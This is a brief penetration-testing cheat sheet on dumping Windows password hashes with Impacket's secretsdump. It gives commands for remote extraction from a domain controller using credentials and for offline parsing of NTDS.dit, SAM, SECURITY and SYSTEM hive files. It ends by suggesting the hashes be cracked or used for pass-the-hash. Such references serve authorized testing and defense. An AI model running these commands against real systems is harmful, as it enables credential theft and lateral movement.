# Dumping Windows Password Hashes

Using Impacket's SecretsDump, we can dump the Windows password hashes.

### Commands <a href="#commands" id="commands"></a>

#### Using Credentials <a href="#using-credentials" id="using-credentials"></a>

```
impacket-secretsdump example.local/username:password@<target-ip>

# -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@<target-ip>
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@<target-ip>
```

#### Using NTDS file or Hives <a href="#using-ntds-file-or-hives" id="using-ntds-file-or-hives"></a>

```
# -ntds: NTDS.DIT file to parse
# -system: SYSTEM hive to parse
impacket-secretsdump -ntds ntds.dit -system system LOCAL

# -sam: SAM hive to parse
# -security: SECURITY hive to parse
# -system: SYSTEM hive to parse
impacket-secretsdump -sam sam.bak -security security.bak -system system.bak LOCAL
```

After dumping, we can crack them to reveal passwords or use them with **Pass-The-Hash**.

### References <a href="#references" id="references"></a>